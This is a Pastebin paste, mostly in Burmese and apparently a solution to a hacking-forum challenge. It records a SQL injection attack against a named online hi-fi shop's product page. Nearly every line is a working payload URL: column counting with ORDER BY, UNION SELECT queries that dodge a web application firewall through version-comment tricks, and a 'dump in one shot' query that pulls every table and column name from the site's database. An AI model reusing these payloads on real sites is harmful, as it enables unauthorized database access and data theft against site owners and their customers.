Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- My Challenge link
- http://www.mmsecurity.net/forum/showthread.php?tid=8052
- Target site :: http://www.quad-hifi.co.uk/product-detail.php?pid=30
- http://www.quad-hifi.co.uk/product-detail.php?pid=30
- ပထမဆံုး error ရွိမရွိ ' ထည့္ စစ္ပါမယ္။ :vic: :vic: :vic:
- http://www.quad-hifi.co.uk/product-detail.php?pid=30'
- ပံုစံေျပာင္းသြားပါတယ္။ :devlish: :devlish: :devlish:
- error ျဖစ္သြားျပီဆိုေတာ့ ျပန္ fix ပါမယ္ :pirate: :pirate: :pirate:
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' -- --
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' order by 1-- -- no error
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' order by 38-- --error
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' order by 37-- --no error
- so 37 columns
- http://www.quad-hifi.co.uk/product-detail.php?pid=30' /*!50000Union*/ Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- --
- (union wafbypass)
- title ေနရာမွာ vul column ျပေနပါတယ္။အဲ့ဒလိုမွ မဟုတ္ရင္ 1111,2222,3333,4444,... နည္းနဲ့ source codes ေဖာ္ျပီးျကည့္နိုင္ပါတယ္။
- http://www.quad-hifi.co.uk/product-detail.php?pid=-30' /*!50000Union*/ Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,CONCAT_WS('<br>','</title></head><center><br><br><br><br>',USER/**x**/(),DATABASE/**x**/(),VERSION()),31,32,33,34,35,36,37-- -- (basic statement ပါ)
- ကြဿ်န္ေတာ္တို့ from ban ထားပါတယ္။
- အာ့ေတာ့ ကြ်န္ေတာ္ တမ်ိူးစမ္းျကည့္ပါတယ္။
- http://www.quad-hifi.co.uk/product-detail.php?pid=-30' and @x:=version() /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,(select concat(unhex(hex(@x)))),31,32,33,34,35,36,37-- --
- ok အဆင္ေျပတယ္
- ဒါေပမယ့္ dios ထုတ္လို့ မရေသးျပန္ဘူး
- ေနာက္ဆံုး ကြ်န္ေတာ္ အဆင္ေျပသြားတဲ့ နည္းက နည္းနည္း ရွုပ္ပါတယ္။အာ့ဒါကလဲ ကြ်န္ေတာ္ ေတာ္ေတာ္ noob လို့ ေနမွာပါ။
- video solution လုပ္ေပးခ်င္ေပမယ့္ ေရးဘူးေရးစ မရွိေတာ့ ခြင့္လြွတ္ေပးျကပါဗ်ာ။
- http://www.quad-hifi.co.uk/product-detail.php?pid=-30' and @x:=(select export_set(5,'</title></head><br><br><br><br><br><center>',(select unhex(hex(group_concat(/*!12345table_name*/,':',/*!12345column_name*/ separator 0x3c62723e))) from /*!12345information_schema*/.columns where table_schema=unhex(hex(/*!12345database*/()))),unhex(hex(concat_ws('<br>','<b>Jerry</b>',user/**/(),database/**/(),version(),''))),2)) /*!12345Union*/ Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,@x,31,32,33,34,35,36,37-- --
- ထပ္ျပီးေတာင္းပန္ခ်င္တာက တကယ္ query ကလဲ မသပ္ရပ္တာေတြ noob တာေတြ အတြက္ပါ။
- အမွားပါရင္ အျကံေပး ေထာက္ျပေပးျကပါအံုး brothers တို့.... :vic: :vic: :vic:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement